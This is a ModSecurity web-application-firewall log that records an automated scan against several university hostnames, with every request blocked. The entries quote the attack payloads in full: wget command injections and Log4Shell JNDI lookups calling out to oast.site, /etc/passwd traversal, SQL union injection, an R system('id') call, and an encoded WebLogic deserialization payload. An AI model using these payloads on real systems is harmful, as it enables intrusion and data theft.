[Tue Aug 29 11:34:26.385707 2023] [:error] [pid 1301] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgzix7t3z9te84g.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUVDNMAAABL"]
[Tue Aug 29 11:34:26.394238 2023] [:error] [pid 1311] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUfi8AAAABU"]
[Tue Aug 29 11:34:27.541670 2023] [:error] [pid 1304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUYm7sAAABN"]
[Tue Aug 29 11:34:27.633642 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUMVLkAAABE"]
[Tue Aug 29 11:34:27.698932 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAATavtUAAAAg"]
[Tue Aug 29 11:34:27.789281 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUZcEMAAABO"]
[Tue Aug 29 11:34:27.792585 2023] [:error] [pid 1310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUeP7cAAABT"]
[Tue Aug 29 11:34:28.058528 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "informatika.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11U8Co-f0AAAT@KuIAAAA2"]
[Tue Aug 29 11:34:28.105030 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "pusatbahasa.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11U8Co-f0AAATovmAAAAAt"]
[Tue Aug 29 11:34:28.142315 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "ft.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11U8Co-f0AAATTmQ4AAAAV"]
[Tue Aug 29 11:34:28.171361 2023] [:error] [pid 1306] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VMCo-f0AAAUa3BEAAABP"]
[Tue Aug 29 11:34:28.227053 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "journal.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VMCo-f0AAATusz0AAAAv"]
[Tue Aug 29 11:34:28.330738 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11VMCo-f0AAAUXLhQAAABM"]
[Tue Aug 29 11:34:28.361724 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11VMCo-f0AAATSkmcAAAAT"]
[Tue Aug 29 11:34:29.331160 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgqmti651j1keeo.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATqf7AAAAAu"]
[Tue Aug 29 11:34:29.331797 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAUMVLsAAABE"]
[Tue Aug 29 11:34:29.331855 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgn5rhufshrgkmz.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAAUIz6QAAABA"]
[Tue Aug 29 11:34:29.332319 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgdahes56srzkzp.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATOA8wAAAAH"]
[Tue Aug 29 11:34:29.338938 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgxdaur5d41ti37.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAASGMwoAAAAA"]
[Tue Aug 29 11:34:29.350399 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgdrhz991yu8w8s.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAASI0DMAAAAG"]
[Tue Aug 29 11:34:29.366708 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAATmZcMAAAAr"]
[Tue Aug 29 11:34:29.367059 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAUbgzgAAABQ"]
[Tue Aug 29 11:34:29.367365 2023] [:error] [pid 1279] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAT-IXUAAAA3"]
[Tue Aug 29 11:34:29.368216 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAASS8BIAAAAY"]
[Tue Aug 29 11:34:29.412301 2023] [:error] [pid 1311] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAAUfi8IAAABU"]
[Tue Aug 29 11:34:29.413402 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAAUNajQAAABF"]
[Tue Aug 29 11:34:29.416191 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATavtkAAAAg"]
[Tue Aug 29 11:34:29.438791 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATSkmgAAAAT"]
[Tue Aug 29 11:34:29.508946 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATUxPoAAAAW"]
[Tue Aug 29 11:34:29.508950 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgqk9rm8hyaxnhi.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/_search"] [unique_id "ZO11VcCo-f0AAATPtQQAAAAM"]
[Tue Aug 29 11:34:29.509572 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgo55q6fekdqekx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VcCo-f0AAATMStYAAAAB"]
[Tue Aug 29 11:34:29.788522 2023] [:error] [pid 1310] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "www.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VcCo-f0AAAUeP7sAAABT"]
[Tue Aug 29 11:34:30.320880 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgqej5ars79qb85.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11VsCo-f0AAATSkmkAAAAT"]
[Tue Aug 29 11:34:30.323421 2023] [:error] [pid 1310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgdek7mx8ifejjh.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAAUeP7wAAABT"]
[Tue Aug 29 11:34:30.325639 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlg3wx6th54zs5gr.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAASEJWQAAAAE"]
[Tue Aug 29 11:34:30.339822 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlghcco3qewhemqz.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAAUIz6YAAABA"]
[Tue Aug 29 11:34:30.355272 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VsCo-f0AAATUxPsAAAAW"]
